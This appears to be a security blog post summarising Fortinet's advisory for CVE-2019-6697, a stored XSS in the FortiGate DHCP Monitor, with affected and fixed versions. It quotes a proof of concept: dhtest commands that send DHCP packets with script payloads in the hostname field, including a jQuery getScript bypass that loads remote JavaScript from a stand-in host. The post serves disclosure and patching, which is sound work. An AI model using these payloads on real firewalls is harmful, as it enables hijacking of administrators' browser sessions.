FortiOS XSS in DHCP-Monitor

Fortinet has released PSIRT FG-IR-19-184 (CVE-2019-6697) about a vulnerability in FortiOS of the FortiGate firewall. A DHCP packet may contain a stored XSS in the hostname parameter field.

Affected Versions and Update

Affected Products are FortiOS 6.2.1 and below & FortiOS 6.0.6 and below.
FortiOS 6.2.2 and FortiOS 6.0.7 fix the vulnerability


PoC/Vulnerability Details from ssd-disclosure.com

Source: https://ssd-disclosure.com/archives/3987/ssd-advisory-fortigate-dhcp-stored-xss

An unauthenticated attacker can trigger a Stored XSS Vulnerability via a malicious DHCP packet in the Fortigate DHCP Monitor.

This can happen if Device Detection is enabled through Network >Interface > Edit Interface > Device Detection

  


 When this option is enabled the attacker may perform the following steps in order to exploit the vulnerability:
  1. Install dhtest or any other tool that can send arbitrary DHCP packets.
    (https://sargandh.wordpress.com/2012/02/23/linux-dhcp-client-simulation-tool/)
  2. Send a malicious DHCP packet. For example:
    1
    2
    3
    4
    #./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "x<svg onload=alert();)>x"
        [Option]
        -m : mac address
        -h : hostname(dhcp option 12). The attacker can inject malicious scripts.

  • Once the victim logs into Fortigate’s dashboard and goes to the “DHCP Monitor”
    (https://<ip>/ng/dhcp/monitor) the browser will execute the malicious script injected by the attacker.

  • But there are a few limitations:

    The user’s input is validated, not allowing us to use tags like “<script src>”, “<img src=_onerror=>” and other similar options. There are also character count limits:
    • DHCP option 12 has a string size limit allowing only up to 256 characters. More information
      about this option is available in the RFC.
    • Fortigate’s string size can’t be longer than 128 characters.
    However, Fortigate uses jQuery which allows the attacker to bypass the mentioned restrictions and execute arbitrary scripts using the following method:


    #./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "x<svg onmouseover=$.getScript('//www.example.jp/a.js')>x"
     

    No comments:

    Post a Comment

    Azure Managed Identities (technical service accounts)

    Explaination Azure Managed Identities = technical service accounts Password is automatically managed, as it was the case in managed service ...